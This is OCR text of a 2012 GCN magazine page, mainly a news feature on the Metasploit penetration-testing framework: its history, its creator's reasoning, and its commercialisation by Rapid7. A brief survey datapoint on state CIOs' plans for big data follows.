by clicking on the page. A slider will appear, allowing you to adjust your zoom level. Return to the original size by clicking on the page again.
the page around when zoomed in by dragging it.
the zoom using the slider on the top right.
by clicking on the zoomed-in page.
by entering text in the search field and click on "In This Issue" or "All Issues" to search the current issue or the archive of back issues respectively.
by clicking on thumbnails to select pages, and then press the print button.
this publication and page.
displays a table of sections with thumbnails and descriptions.
displays thumbnails of every page in the issue. Click on a page to jump.
allows you to browse through every available issue.
GCN : December 2012
10 GCN DECEMBER 2012 • GCN.COM [BrieFing] Two months is not a lot of time to develop a public-fac- ing website. But if an agency has a development platform already in place and works with a company that knows something about moving applications to the cloud, it just might have a successful launch. The Metasploit Framework can be used for good or ill, but its purpose is to give the good guys the same tools the bad guys are already using. Metasploit has become a go-to platform for penetra- tion testing and signature development, so much so that disclosure of new soft- ware vulnerabilities often are accompanied by a Metasploit exploit module. The Metasploit Project is a computer security project that developed and maintains the Metasploit Framework for creating and executing exploit code. Available as a free open-source tool and in more sophisticated commercial products from Rapid7, it con- tains libraries of vulnerabilities and modules to exploit them. The framework lets develop- ers and researchers build exploits to test for holes in IT systems, and its modularity allows the combination of dif- ferent exploits and payloads. Ostensibly a tool for penetration testing by good guys, Metasploit can be used for either good or evil. But its purpose is to democratize IT security, said H.D. Moore, who created Metasploit in 2003. "It started out as more of a political thing than anything else," Moore said. At a time when only black hats had access to exploits and attack tools, white hat developers, researchers and security professionals were operating at a disadvantage. "The main goal was to put them all on the same footing." Originally written in Perl script and rst released in late 2003, Metasploit since has been rewritten in Ruby. It now is in version 4.0 and contains about 900 exploit modules for Windows, Unix, Linux and Mac OS operating systems. It also contains several hundred modules for fuzzing, which can discover previously unknown or unsuspected vulnerabilities in a target. A user selects a target machine, selects exploit modules to test for a vulnerability or vulnerabilities, selects the payloads for the exploits and launches it at the target. If the vulnerability is there, the exploit should get through to deliver its payload. Public-sector agen- cies are among those that have availed themselves of Metasploit's penetration testing tools, and it has also been used by agencies in red team/blue team exercises. The framework allows cre- ation of new exploit modules with a minimum of work, so Metasploit can keep up with the growing number of vulnerabilities. When zero- day exploits of a Java aw were discovered in August, potentially affecting billions of devices, Metasploit devel- oped an exploit for it and, after Oracle issued a patch, tested it against the exploit to con rm that the patch was effective. The Metasploit Project was acquired by the security com- pany Rapid7 in 2009. Com- mercializing Metasploit was something "that had been in the back of my mind forever," said Moore, who now is chief security of cer at Rapid7. So Metasploit and Rapid7 hammered out a plan to allow commercial development while maintaining Metasploit's open-source availability. The Metasploit Com- munity Edition remains an open-source tool with all the functionality, available for free download. Metasploit Express and Pro are com- mercial products built on the open-source core with ad- ditional bells and whistles to make them more user-friendly and scalable. All modules are available rst in the open- source version. What does the security community think of a tool that makes it easy for anybody, re- gardless of the color of his or her hat, to launch an attack? "We did get a lot of push- back early on in the project," Moore said. But he points out that the bad guys already had tools for launching attacks. "The bad guys don't use Metasploit." Today almost all of the exploits in Metasploit modules have appeared in the wild rst, so that avail- ability of the tool is not a big advantage to attackers. --- William Jackson How zero-day exploits can improve security Where is big data in state CIOs' strategic planning? [datapoint] Not in the plan at all, no plans to add it to the plan We are discussing adding big data to the plan In the plan indirectly Addressed directly in the plan A central part of the plan Don't know/does not apply Source: NASCIO, TechAmerica, Grant Thornton